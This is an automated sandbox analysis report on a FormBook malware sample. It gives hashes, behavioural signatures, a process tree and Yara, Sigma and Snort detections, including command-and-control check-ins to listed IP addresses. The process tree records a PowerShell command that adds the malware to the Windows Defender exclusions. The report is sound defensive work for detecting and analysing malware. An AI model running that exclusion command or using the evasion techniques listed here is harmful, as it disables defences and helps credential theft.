Edit tour

Windows Analysis Report
H25iQbxCki.exe

Overview

General Information

Sample name:	H25iQbxCki.exe renamed because original name is a hash value
Original sample name:	0e7a378b14d45a01c31a3de6198273f1837ec450d2a9a457432896e1311023a6.exe
Analysis ID:	1452335
MD5:	61300540a2fccd044d641329a7102e47
SHA1:	9c159ec0c6dfccb5c47b454b877be86feb46b268
SHA256:	0e7a378b14d45a01c31a3de6198273f1837ec450d2a9a457432896e1311023a6
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected FormBook

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Disables UAC (registry)

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Uncommon Svchost Parent Process

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

H25iQbxCki.exe (PID: 7420 cmdline: "C:\Users\user\Desktop\H25iQbxCki.exe" MD5: 61300540A2FCCD044D641329A7102E47)

conhost.exe (PID: 7428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7592 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\H25iQbxCki.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7908 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

svchost.exe (PID: 7628 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

ilasm.exe (PID: 7708 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe" MD5: 2B2AE2C9C5D693D2306EF388583B1A03)

uwZgUlCQSPVT.exe (PID: 2896 cmdline: "C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

chkdsk.exe (PID: 8000 cmdline: "C:\Windows\SysWOW64\chkdsk.exe" MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)

uwZgUlCQSPVT.exe (PID: 5228 cmdline: "C:\Program Files (x86)\kBvRNZzEDWKxiKRbGtJJcVabtdANvLUGxAUYhMfJpWykgAwcOmSPyGPEzJTsgFntPfPBFGzaU\uwZgUlCQSPVT.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 2640 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

ilasm.exe (PID: 7716 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe" MD5: 2B2AE2C9C5D693D2306EF388583B1A03)

WerFault.exe (PID: 7804 cmdline: C:\Windows\system32\WerFault.exe -u -p 7420 -s 1344 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a260:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x138bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.1869984902.0000000005ED0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1869984902.0000000005ED0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a260:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x138bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dc53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.4144364221.0000000004A00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.4144364221.0000000004A00000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a260:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x138bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.1927554553.00000214804B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000010.00000002.4145287645.0000000002B50000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.4145287645.0000000002B50000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2c722:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x15d81:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.4144410750.0000000004A40000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.4144410750.0000000004A40000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2a260:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x138bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.4145259981.00000000025C0000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.4145259981.00000000025C0000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x567825:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x550e84:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.1870033073.0000000005F20000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1870033073.0000000005F20000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x567825:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x550e84:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: H25iQbxCki.exe PID: 7420	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: H25iQbxCki.exe PID: 7420	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.ilasm.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.ilasm.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dc53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
5.2.ilasm.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.ilasm.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ce53:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x164b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\H25iQbxCki.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\H25iQbxCki.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\H25iQbxCki.exe", ParentImage: C:\Users\user\Desktop\H25iQbxCki.exe, ParentProcessId: 7420, ParentProcessName: H25iQbxCki.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\H25iQbxCki.exe" -Force, ProcessId: 7592, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\H25iQbxCki.exe", ParentImage: C:\Users\user\Desktop\H25iQbxCki.exe, ParentProcessId: 7420, ParentProcessName: H25iQbxCki.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 7628, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\H25iQbxCki.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\H25iQbxCki.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\H25iQbxCki.exe", ParentImage: C:\Users\user\Desktop\H25iQbxCki.exe, ParentProcessId: 7420, ParentProcessName: H25iQbxCki.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\H25iQbxCki.exe" -Force, ProcessId: 7592, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\H25iQbxCki.exe", ParentImage: C:\Users\user\Desktop\H25iQbxCki.exe, ParentProcessId: 7420, ParentProcessName: H25iQbxCki.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 7628, ProcessName: svchost.exe

Snort Signatures

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 103.168.172.37

Timestamp:	06/05/24-15:07:33.876706
SID:	2855464
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.111

Timestamp:	06/05/24-15:06:21.843725
SID:	2855464
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.0.237.22

Timestamp:	06/05/24-15:06:49.864855
SID:	2855464
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 104.37.39.71

Timestamp:	06/05/24-15:07:52.330377
SID:	2855465
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 57.151.38.169

Timestamp:	06/05/24-15:09:00.299213
SID:	2855464
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 57.151.38.169

Timestamp:	06/05/24-15:05:53.733365
SID:	2855464
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/05/24-15:06:08.076788
SID:	2855464
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/05/24-15:08:47.000117
SID:	2855464
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 199.59.243.225

Timestamp:	06/05/24-15:08:09.139584
SID:	2855464
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/05/24-15:09:11.500533
SID:	2855464
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/05/24-15:09:14.031067
SID:	2855464
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.111

Timestamp:	06/05/24-15:06:26.906205
SID:	2855465
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 136.143.186.12

Timestamp:	06/05/24-15:07:09.527378
SID:	2855464
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/05/24-15:08:52.065438
SID:	2855465
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 136.143.186.12

Timestamp:	06/05/24-15:07:17.141135
SID:	2855465
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.111

Timestamp:	06/05/24-15:06:19.085370
SID:	2855464
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 104.37.39.71

Timestamp:	06/05/24-15:07:44.734158
SID:	2855464
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.111

Timestamp:	06/05/24-15:09:27.343164
SID:	2855464
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/05/24-15:06:13.156898
SID:	2855465
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 57.151.38.169

Timestamp:	06/05/24-15:09:05.750122
SID:	2855465
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/05/24-15:06:05.546932
SID:	2855464
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 91.195.240.123

Timestamp:	06/05/24-15:06:40.827175
SID:	2855465
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 199.59.243.225

Timestamp:	06/05/24-15:08:14.224942
SID:	2855465
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/05/24-15:05:35.307159
SID:	2855465
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/05/24-15:08:44.469264
SID:	2855464
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 57.151.38.169

Timestamp:	06/05/24-15:08:57.769545
SID:	2855464
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 57.151.38.169

Timestamp:	06/05/24-15:05:51.205286
SID:	2855464
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 136.143.186.12

Timestamp:	06/05/24-15:07:12.072953
SID:	2855464
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.111

Timestamp:	06/05/24-15:09:24.813693
SID:	2855464
Source Port:	49793
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M4 - Source IP: 192.168.2.4 - Destination IP: 57.151.38.169

Timestamp:	06/05/24-15:05:51.205286
SID:	2856318
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 199.59.243.225

Timestamp:	06/05/24-15:08:06.599113
SID:	2855464
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 103.168.172.37

Timestamp:	06/05/24-15:07:38.937741
SID:	2855465
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 91.195.240.123

Timestamp:	06/05/24-15:06:33.229915
SID:	2855464
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 217.160.0.111

Timestamp:	06/05/24-15:09:32.485605
SID:	2855465
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 162.0.237.22

Timestamp:	06/05/24-15:06:54.922157
SID:	2855465
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 57.151.38.169

Timestamp:	06/05/24-15:05:58.796005
SID:	2855465
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 91.195.240.123

Timestamp:	06/05/24-15:06:35.771526
SID:	2855464
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (GET) M2 - Source IP: 192.168.2.4 - Destination IP: 162.241.216.140

Timestamp:	06/05/24-15:09:19.097532
SID:	2855465
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 104.37.39.71

Timestamp:	06/05/24-15:07:47.264891
SID:	2855464
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 103.168.172.37

Timestamp:	06/05/24-15:07:31.252004
SID:	2855464
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN FormBook CnC Checkin (POST) M3 - Source IP: 192.168.2.4 - Destination IP: 162.0.237.22

Timestamp:	06/05/24-15:06:47.327509
SID:	2855464
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: H25iQbxCki.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: H25iQbxCki.exe	Virustotal: Detection: 43%			Perma Link
Source: H25iQbxCki.exe	ReversingLabs: Detection: 42%

Yara detected FormBook

Source: Yara match	File source: 5.2.ilasm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ilasm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1869984902.0000000005ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4144364221.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4145287645.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4144410750.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4145259981.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1870033073.0000000005F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 00000000.00000002.1927554553.00000214804B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: H25iQbxCki.exe PID: 7420, type: MEMORYSTR

Source: H25iQbxCki.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Xml.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdbRSDS source: WER2640.tmp.dmp.9.dr
Source:	Binary string: System.Windows.Forms.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: wntdll.pdbUGP source: ilasm.exe, 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000003.1871541059.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000003.1869616615.0000000004C8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: wntdll.pdb source: ilasm.exe, ilasm.exe, 00000005.00000002.1869613069.0000000005B80000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000C.00000002.4145392650.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000003.1871541059.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4145392650.000000000518E000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000C.00000003.1869616615.0000000004C8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WER2640.tmp.dmp.9.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2640.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdbH source: WER2640.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER2640.tmp.dmp.9.dr
